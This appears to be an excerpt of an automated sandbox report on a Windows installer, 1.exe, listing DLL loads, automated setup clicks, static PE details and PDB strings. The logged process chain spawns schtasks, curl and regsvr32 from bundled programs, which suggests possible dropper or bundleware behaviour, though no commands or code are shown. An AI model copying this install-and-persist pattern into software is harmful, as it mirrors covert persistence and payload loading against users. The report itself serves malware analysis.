    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: coremessaging.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: twinapi.appcore.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: coremessaging.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: propsys.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wintypes.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: coreuicomponents.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ntmarta.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: coremessaging.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wintypes.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wintypes.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wintypes.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: windows.ui.immersive.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msasn1.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: version.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netapi32.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netutils.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: samcli.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wininet.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iertutil.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: apphelp.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: aclayers.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mpr.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc_os.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msi.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wininet.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iertutil.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sspicli.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: windows.storage.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wldp.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: profapi.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: winhttp.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mswsock.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iphlpapi.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: winnsi.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: urlmon.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: srvcli.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netutils.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: dnsapi.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rasadhlp.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: fwpuclnt.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: schannel.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mskeyprotect.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ntasn1.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msasn1.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: dpapi.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: cryptsp.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rsaenh.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: cryptbase.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: gpapi.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ncrypt.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ncryptsslp.dllJump to behavior
    Source: C:\Program Files (x86)\Main\MainSoftware.exeSection loaded: apphelp.dllJump to behavior
    Source: C:\Program Files (x86)\Main\MainSoftware.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Program Files (x86)\Main\MainSoftware.exeSection loaded: icu.dllJump to behavior
    Source: C:\Program Files (x86)\Main\MainSoftware.exeSection loaded: secur32.dllJump to behavior
    Source: C:\Program Files (x86)\Main\MainSoftware.exeSection loaded: sspicli.dllJump to behavior
    Source: C:\Program Files (x86)\Main\MainSoftware.exeSection loaded: iphlpapi.dllJump to behavior
    Source: C:\Program Files (x86)\Main\MainSoftware.exeSection loaded: dnsapi.dllJump to behavior
    Source: C:\Program Files (x86)\Main\MainSoftware.exeSection loaded: dhcpcsvc6.dllJump to behavior
    Source: C:\Program Files (x86)\Main\MainSoftware.exeSection loaded: dhcpcsvc.dllJump to behavior
    Source: C:\Program Files (x86)\Main\MainSoftware.exeSection loaded: winnsi.dllJump to behavior
    Source: C:\Program Files (x86)\Main\MainSoftware.exeSection loaded: winhttp.dllJump to behavior
    Source: C:\Program Files (x86)\Main\MainSoftware.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
    Source: C:\Program Files (x86)\Main\MainSoftware.exeSection loaded: mswsock.dllJump to behavior
    Source: C:\Program Files (x86)\Main\MainSoftware.exeSection loaded: wshunix.dllJump to behavior
    Source: C:\Program Files (x86)\Main\MainSoftware.exeSection loaded: winrnr.dllJump to behavior
    Source: C:\Program Files (x86)\Main\MainSoftware.exeSection loaded: rasadhlp.dllJump to behavior
    Source: C:\Program Files (x86)\Main\MainSoftware.exeSection loaded: nlaapi.dllJump to behavior
    Source: C:\Program Files (x86)\Main\MainSoftware.exeSection loaded: wshbth.dllJump to behavior
    Source: C:\Program Files (x86)\Main\MainSoftware.exeSection loaded: devobj.dllJump to behavior
    Source: C:\Program Files (x86)\Main\MainSoftware.exeSection loaded: pnrpnsp.dllJump to behavior
    Source: C:\Program Files (x86)\Main\MainSoftware.exeSection loaded: napinsp.dllJump to behavior
    Source: C:\Program Files (x86)\Main\MainSoftware.exeSection loaded: fwpuclnt.dllJump to behavior
    Source: C:\Program Files (x86)\Main\MainSoftware.exeSection loaded: schannel.dllJump to behavior
    Source: C:\Program Files (x86)\Main\MainSoftware.exeSection loaded: mskeyprotect.dllJump to behavior
    Source: C:\Program Files (x86)\Main\MainSoftware.exeSection loaded: ntasn1.dllJump to behavior
    Source: C:\Program Files (x86)\Main\MainSoftware.exeSection loaded: ncrypt.dllJump to behavior
    Source: C:\Program Files (x86)\Main\MainSoftware.exeSection loaded: ncryptsslp.dllJump to behavior
    Source: C:\Program Files (x86)\Main\MainSoftware.exeSection loaded: msasn1.dllJump to behavior
    Source: C:\Program Files (x86)\Main\MainSoftware.exeSection loaded: cryptsp.dllJump to behavior
    Source: C:\Program Files (x86)\Main\MainSoftware.exeSection loaded: rsaenh.dllJump to behavior
    Source: C:\Program Files (x86)\Main\MainSoftware.exeSection loaded: cryptbase.dllJump to behavior
    Source: C:\Program Files (x86)\Main\MainSoftware.exeSection loaded: gpapi.dllJump to behavior
    Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
    Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
    Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
    Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
    Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
    Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
    Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
Source: C:\Program Files (x86)\Main\MainSoftware.exe | Section loaded: kernel.appcore.dll
Source: C:\Program Files (x86)\Main\MainSoftware.exe | Section loaded: icu.dll
Source: C:\Program Files (x86)\Main\MainSoftware.exe | Section loaded: iphlpapi.dll
Source: C:\Program Files (x86)\Main\MainSoftware.exe | Section loaded: dnsapi.dll
Source: C:\Program Files (x86)\Main\MainSoftware.exe | Section loaded: dhcpcsvc6.dll
Source: C:\Program Files (x86)\Main\MainSoftware.exe | Section loaded: dhcpcsvc.dll
Source: C:\Program Files (x86)\Main\MainSoftware.exe | Section loaded: winnsi.dll
Source: C:\Program Files (x86)\Main\MainSoftware.exe | Section loaded: winhttp.dll
Source: C:\Program Files (x86)\Main\MainSoftware.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Program Files (x86)\Main\MainSoftware.exe | Section loaded: mswsock.dll
Source: C:\Program Files (x86)\Main\MainSoftware.exe | Section loaded: wshunix.dll
Source: C:\Program Files (x86)\Main\MainSoftware.exe | Section loaded: winrnr.dll
Source: C:\Program Files (x86)\Main\MainSoftware.exe | Section loaded: rasadhlp.dll
Source: C:\Program Files (x86)\Main\MainSoftware.exe | Section loaded: nlaapi.dll
Source: C:\Program Files (x86)\Main\MainSoftware.exe | Section loaded: wshbth.dll
Source: C:\Program Files (x86)\Main\MainSoftware.exe | Section loaded: devobj.dll
Source: C:\Program Files (x86)\Main\MainSoftware.exe | Section loaded: pnrpnsp.dll
Source: C:\Program Files (x86)\Main\MainSoftware.exe | Section loaded: napinsp.dll
Source: C:\Program Files (x86)\Main\MainSoftware.exe | Section loaded: fwpuclnt.dll
Source: C:\Program Files (x86)\Main\MainSoftware.exe | Section loaded: sspicli.dll
Source: C:\Program Files (x86)\Main\MainSoftware.exe | Section loaded: schannel.dll
Source: C:\Program Files (x86)\Main\MainSoftware.exe | Section loaded: mskeyprotect.dll
Source: C:\Program Files (x86)\Main\MainSoftware.exe | Section loaded: ntasn1.dll
Source: C:\Program Files (x86)\Main\MainSoftware.exe | Section loaded: ncrypt.dll
Source: C:\Program Files (x86)\Main\MainSoftware.exe | Section loaded: ncryptsslp.dll
Source: C:\Program Files (x86)\Main\MainSoftware.exe | Section loaded: msasn1.dll
Source: C:\Program Files (x86)\Main\MainSoftware.exe | Section loaded: cryptsp.dll
Source: C:\Program Files (x86)\Main\MainSoftware.exe | Section loaded: rsaenh.dll
Source: C:\Program Files (x86)\Main\MainSoftware.exe | Section loaded: cryptbase.dll
Source: C:\Program Files (x86)\Main\MainSoftware.exe | Section loaded: gpapi.dll
Source: C:\Program Files (x86)\Main\MainSoftware.exe | Section loaded: uxtheme.dll
Source: C:\Program Files (x86)\Main\MainSoftware.exe | Section loaded: windows.storage.dll
Source: C:\Program Files (x86)\Main\MainSoftware.exe | Section loaded: wldp.dll
Source: C:\Program Files (x86)\Main\MainSoftware.exe | Section loaded: propsys.dll
Source: C:\Program Files (x86)\Main\MainSoftware.exe | Section loaded: profapi.dll
Source: C:\Program Files (x86)\Main\MainSoftware.exe | Section loaded: edputil.dll
Source: C:\Program Files (x86)\Main\MainSoftware.exe | Section loaded: urlmon.dll
Source: C:\Program Files (x86)\Main\MainSoftware.exe | Section loaded: iertutil.dll
Source: C:\Program Files (x86)\Main\MainSoftware.exe | Section loaded: srvcli.dll
Source: C:\Program Files (x86)\Main\MainSoftware.exe | Section loaded: netutils.dll
Source: C:\Program Files (x86)\Main\MainSoftware.exe | Section loaded: windows.staterepositoryps.dll
Source: C:\Program Files (x86)\Main\MainSoftware.exe | Section loaded: wintypes.dll
Source: C:\Program Files (x86)\Main\MainSoftware.exe | Section loaded: appresolver.dll
Source: C:\Program Files (x86)\Main\MainSoftware.exe | Section loaded: bcp47langs.dll
Source: C:\Program Files (x86)\Main\MainSoftware.exe | Section loaded: slc.dll
Source: C:\Program Files (x86)\Main\MainSoftware.exe | Section loaded: userenv.dll
Source: C:\Program Files (x86)\Main\MainSoftware.exe | Section loaded: sppc.dll
Source: C:\Program Files (x86)\Main\MainSoftware.exe | Section loaded: onecorecommonproxystub.dll
Source: C:\Program Files (x86)\Main\MainSoftware.exe | Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Program Files (x86)\Main\MainSoftware.exe | Section loaded: apphelp.dll
Source: C:\Program Files (x86)\Atomix\Addons\SoftwareDistributor.exe | Section loaded: apphelp.dll
Source: C:\Program Files (x86)\Atomix\Addons\SoftwareDistributor.exe | Section loaded: kernel.appcore.dll
Source: C:\Program Files (x86)\Atomix\Addons\SoftwareDistributor.exe | Section loaded: icu.dll
Source: C:\Program Files (x86)\Atomix\Addons\SoftwareDistributor.exe | Section loaded: windows.storage.dll
Source: C:\Program Files (x86)\Atomix\Addons\SoftwareDistributor.exe | Section loaded: wldp.dll
Source: C:\Program Files (x86)\Atomix\Addons\SoftwareDistributor.exe | Section loaded: iphlpapi.dll
Source: C:\Program Files (x86)\Atomix\Addons\SoftwareDistributor.exe | Section loaded: dnsapi.dll
Source: C:\Program Files (x86)\Atomix\Addons\SoftwareDistributor.exe | Section loaded: dhcpcsvc6.dll
Source: C:\Program Files (x86)\Atomix\Addons\SoftwareDistributor.exe | Section loaded: dhcpcsvc.dll
Source: C:\Program Files (x86)\Atomix\Addons\SoftwareDistributor.exe | Section loaded: winnsi.dll
Source: C:\Program Files (x86)\Atomix\Addons\SoftwareDistributor.exe | Section loaded: winhttp.dll
Source: C:\Program Files (x86)\Atomix\Addons\SoftwareDistributor.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Program Files (x86)\Atomix\Addons\SoftwareDistributor.exe | Section loaded: mswsock.dll
Source: C:\Program Files (x86)\Atomix\Addons\SoftwareDistributor.exe | Section loaded: wshunix.dll
Source: C:\Program Files (x86)\Atomix\Addons\SoftwareDistributor.exe | Section loaded: winrnr.dll
Source: C:\Program Files (x86)\Atomix\Addons\SoftwareDistributor.exe | Section loaded: rasadhlp.dll
Source: C:\Program Files (x86)\Atomix\Addons\SoftwareDistributor.exe | Section loaded: nlaapi.dll
Source: C:\Program Files (x86)\Atomix\Addons\SoftwareDistributor.exe | Section loaded: wshbth.dll
Source: C:\Program Files (x86)\Atomix\Addons\SoftwareDistributor.exe | Section loaded: devobj.dll
Source: C:\Program Files (x86)\Atomix\Addons\SoftwareDistributor.exe | Section loaded: pnrpnsp.dll
Source: C:\Program Files (x86)\Atomix\Addons\SoftwareDistributor.exe | Section loaded: napinsp.dll
Source: C:\Program Files (x86)\Atomix\Addons\SoftwareDistributor.exe | Section loaded: fwpuclnt.dll
Source: C:\Program Files (x86)\Atomix\Addons\SoftwareDistributor.exe | Section loaded: sspicli.dll
Source: C:\Program Files (x86)\Atomix\Addons\SoftwareDistributor.exe | Section loaded: schannel.dll
Source: C:\Program Files (x86)\Atomix\Addons\SoftwareDistributor.exe | Section loaded: mskeyprotect.dll
Source: C:\Program Files (x86)\Atomix\Addons\SoftwareDistributor.exe | Section loaded: ntasn1.dll
Source: C:\Program Files (x86)\Atomix\Addons\SoftwareDistributor.exe | Section loaded: ncrypt.dll
Source: C:\Program Files (x86)\Atomix\Addons\SoftwareDistributor.exe | Section loaded: ncryptsslp.dll
Source: C:\Program Files (x86)\Atomix\Addons\SoftwareDistributor.exe | Section loaded: msasn1.dll
Source: C:\Program Files (x86)\Atomix\Addons\SoftwareDistributor.exe | Section loaded: cryptsp.dll
Source: C:\Program Files (x86)\Atomix\Addons\SoftwareDistributor.exe | Section loaded: rsaenh.dll
Source: C:\Program Files (x86)\Atomix\Addons\SoftwareDistributor.exe | Section loaded: cryptbase.dll
Source: C:\Program Files (x86)\Atomix\Addons\SoftwareDistributor.exe | Section loaded: gpapi.dll
Source: C:\Windows\System32\schtasks.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exe | Section loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\schtasks.exe | Section loaded: xmllite.dll
Source: C:\Program Files (x86)\Main\Chop\Install.exe | Section loaded: apphelp.dll
Source: C:\Program Files (x86)\Main\Chop\Install.exe | Section loaded: kernel.appcore.dll
Source: C:\Program Files\Surfclub\Install.exe | Section loaded: apphelp.dll
Source: C:\Program Files\Surfclub\Install.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\cmd.exe | Section loaded: apphelp.dll
Source: C:\Windows\System32\curl.exe | Section loaded: secur32.dll
Source: C:\Windows\System32\curl.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\curl.exe | Section loaded: iphlpapi.dll
Source: C:\Windows\System32\curl.exe | Section loaded: mswsock.dll
Source: C:\Windows\System32\curl.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\curl.exe | Section loaded: dnsapi.dll
Source: C:\Windows\System32\curl.exe | Section loaded: rasadhlp.dll
Source: C:\Windows\System32\curl.exe | Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\curl.exe | Section loaded: schannel.dll
Source: C:\Windows\System32\curl.exe | Section loaded: mskeyprotect.dll
Source: C:\Windows\System32\curl.exe | Section loaded: ntasn1.dll
Source: C:\Windows\System32\curl.exe | Section loaded: ncrypt.dll
Source: C:\Windows\System32\curl.exe | Section loaded: ncryptsslp.dll
Source: C:\Windows\System32\regsvr32.exe | Section loaded: apphelp.dll
Source: C:\Windows\System32\regsvr32.exe | Section loaded: aclayers.dll
Source: C:\Windows\System32\regsvr32.exe | Section loaded: sfc.dll
Source: C:\Windows\System32\regsvr32.exe | Section loaded: sfc_os.dll
Source: C:\Windows\System32\regsvr32.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\regsvr32.exe | Section loaded: uxtheme.dll
Source: C:\Windows\System32\regsvr32.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\regsvr32.exe | Section loaded: secur32.dll
Source: C:\Windows\System32\regsvr32.exe | Section loaded: iphlpapi.dll
Source: C:\Windows\System32\regsvr32.exe | Section loaded: mswsock.dll
Source: C:\Windows\System32\regsvr32.exe | Section loaded: dnsapi.dll
Source: C:\Windows\System32\regsvr32.exe | Section loaded: rasadhlp.dll
Source: C:\Users\user\Desktop\1.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32
Source: C:\Users\user\Desktop\1.exe | Automated click: Next >
Source: C:\Users\user\Desktop\1.exe | Automated click: I accept the terms in the License Agreement
Source: C:\Users\user\Desktop\1.exe | Automated click: Next >
Source: C:\Users\user\Desktop\1.exe | Automated click: Next >
Source: C:\Users\user\Desktop\1.exe | Automated click: Install
Source: Window Recorder | Window detected: More than 3 window changes detected
Source: 1.exe | Static PE information: certificate valid
Source: 1.exe | Static PE information: Virtual size of .text is bigger than: 0x100000
Source: 1.exe | Static file information: File size 34378808 > 1048576
Source: 1.exe | Static PE information: Raw size of .text is bigger than: 0x100000 < 0x2c9200
Source: 1.exe | Static PE information: More than 200 imports for KERNEL32.dll
Source: 1.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: 1.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: 1.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: 1.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: 1.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: 1.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
Source: 1.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
Source: 1.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
    Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Threading.Thread\Release\net8.0\System.Threading.Thread.pdb source: MainSoftware.exe, 00000010.00000002.2142756269.0000027538140000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000015.00000002.2261474850.000002BDD0C91000.00000020.00000001.00040000.0000000A.sdmp
    Source: Binary string: System.Net.Sockets.ni.pdb source: MainSoftware.exe, 00000010.00000002.2143851076.0000027538581000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000010.00000002.2143804192.0000027538541000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Text.Json\Release\net8.0\System.Text.Json.pdb source: MainSoftware.exe, 00000010.00000002.2143394007.00000275383E1000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000010.00000002.2143312727.000002753834C000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: /_/artifacts/obj/System.Runtime.InteropServices.RuntimeInformation/Release/net8.0-windows/System.Runtime.InteropServices.RuntimeInformation.pdb source: MainSoftware.exe, 00000010.00000002.2143093774.00000275382B1000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: Microsoft.Win32.Registry.ni.pdb source: MainSoftware.exe, 00000010.00000002.2143232066.0000027538317000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000010.00000002.2143295395.0000027538331000.00000020.00000001.00040000.0000000A.sdmp
    Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Diagnostics.DiagnosticSource\Release\net8.0\System.Diagnostics.DiagnosticSource.pdbSHA256P?> source: MainSoftware.exe, 00000010.00000002.2142461937.0000027537EE1000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000010.00000002.2142367623.0000027537EB3000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Security.Cryptography\Release\net8.0-windows\System.Security.Cryptography.pdb source: MainSoftware.exe, 00000010.00000002.2142592762.0000027537FB6000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000010.00000002.2142689155.0000027538081000.00000020.00000001.00040000.0000000A.sdmp
    Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Net.Ping\Release\net8.0-windows\System.Net.Ping.pdb source: MainSoftware.exe, 00000010.00000002.2141897499.0000027536210000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: /_/artifacts/obj/System.Security.Cryptography.X509Certificates/Release/net8.0-windows/System.Security.Cryptography.X509Certificates.pdb source: MainSoftware.exe, 00000010.00000002.2142592762.0000027537FB1000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: System.Net.Security.ni.pdb source: MainSoftware.exe, 00000010.00000002.2142559459.0000027537F61000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000010.00000002.2142488273.0000027537F19000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: System.Security.Principal.Windows.ni.pdb source: MainSoftware.exe, 00000010.00000002.2151399807.000002753B3D1000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000010.00000002.2151185629.000002753B3B1000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Collections.NonGeneric\Release\net8.0\System.Collections.NonGeneric.pdb source: MainSoftware.exe, 00000010.00000002.2143077066.00000275382A1000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000010.00000002.2143041301.0000027538291000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: System.ObjectModel.ni.pdb source: MainSoftware.exe, 00000010.00000002.2140691802.00000275352B4000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Threading.Overlapped\Release\net8.0\System.Threading.Overlapped.pdbSHA256t source: MainSoftware.exe, 00000010.00000002.2143935572.00000275385E2000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000010.00000002.2143966375.00000275385F1000.00000020.00000001.00040000.0000000A.sdmp
    Source: Binary string: System.Net.Http.Json.ni.pdb source: MainSoftware.exe, 00000010.00000002.2143160448.00000275382EA000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000010.00000002.2143209931.0000027538301000.00000020.00000001.00040000.0000000A.sdmp
    Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Collections.Concurrent\Release\net8.0\System.Collections.Concurrent.pdb source: MainSoftware.exe, 00000010.00000002.2143697931.00000275384FD000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000010.00000002.2143781631.0000027538521000.00000020.00000001.00040000.0000000A.sdmp
    Source: Binary string: C:\Users\Admin\Distributor\Installers Project\Generic\ConsoleApp1\obj\Release\net8.0\win-x64\ConsoleApp1.pdb source: MainSoftware.exe, 00000010.00000002.2139786896.000002349ED61000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000010.00000002.2139740826.000002349ED57000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Net.NameResolution\Release\net8.0-windows\System.Net.NameResolution.pdb source: MainSoftware.exe, 00000010.00000002.2150696251.000002753B381000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000010.00000002.2150453848.000002753B36D000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Linq\Release\net8.0\System.Linq.pdb source: MainSoftware.exe, 00000010.00000002.2140001032.000002349EDF3000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000010.00000002.2140127974.00000234A06D1000.00000020.00000001.00040000.0000000A.sdmp
    Source: Binary string: System.Text.Json.ni.pdb source: MainSoftware.exe, 00000010.00000002.2143394007.00000275383E1000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000010.00000002.2143312727.000002753834C000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: System.Linq.ni.pdb source: MainSoftware.exe, 00000010.00000002.2140001032.000002349EDF3000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000010.00000002.2140127974.00000234A06D1000.00000020.00000001.00040000.0000000A.sdmp
    Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Diagnostics.Tracing\Release\net8.0\System.Diagnostics.Tracing.pdb source: MainSoftware.exe, 00000010.00000002.2141976926.0000027536269000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000010.00000002.2142022174.0000027536271000.00000020.00000001.00040000.0000000A.sdmp
    Source: Binary string: System.ComponentModel.EventBasedAsync.ni.pdb source: MainSoftware.exe, 00000010.00000002.2142971155.0000027538262000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Numerics.Vectors\Release\net8.0\System.Numerics.Vectors.pdbSHA256 source: MainSoftware.exe, 00000010.00000002.2143681745.00000275384E1000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000010.00000002.2143619192.00000275384DC000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: /_/src/Serilog/obj/Release/net8.0/Serilog.pdb source: MainSoftware.exe, 00000010.00000002.2140213322.00000234A0741000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000010.00000002.2140154271.00000234A070D000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: wininet.pdbUGP source: 1.exe, 00000004.00000003.1321424870.0000000009918000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 0000000B.00000003.1517432545.000000000744C000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: System.Collections.ni.pdb source: MainSoftware.exe, 00000010.00000002.2139962633.000002349EDC9000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000010.00000002.2139926749.000002349ED91000.00000020.00000001.00040000.0000000A.sdmp
    Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Net.Http\Release\net8.0-windows\System.Net.Http.pdbSHA256 source: MainSoftware.exe, 00000010.00000002.2141840198.0000027536161000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000010.00000002.2141751848.00000275360B8000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: System.Private.CoreLib.ni.pdb source: MainSoftware.exe, 00000010.00000002.2140691802.00000275352BE000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000010.00000002.2141123759.0000027535751000.00000020.00000001.00040000.0000000A.sdmp
    Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Private.Uri\Release\net8.0\System.Private.Uri.pdb source: MainSoftware.exe, 00000010.00000002.2142815364.0000027538167000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000010.00000002.2142869783.0000027538191000.00000020.00000001.00040000.0000000A.sdmp
    Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Net.Primitives\Release\net8.0-windows\System.Net.Primitives.pdb source: MainSoftware.exe, 00000010.00000002.2141954837.0000027536241000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000010.00000002.2141897499.000002753621B000.00000002.00000001.00040000.0000000A.sdmp
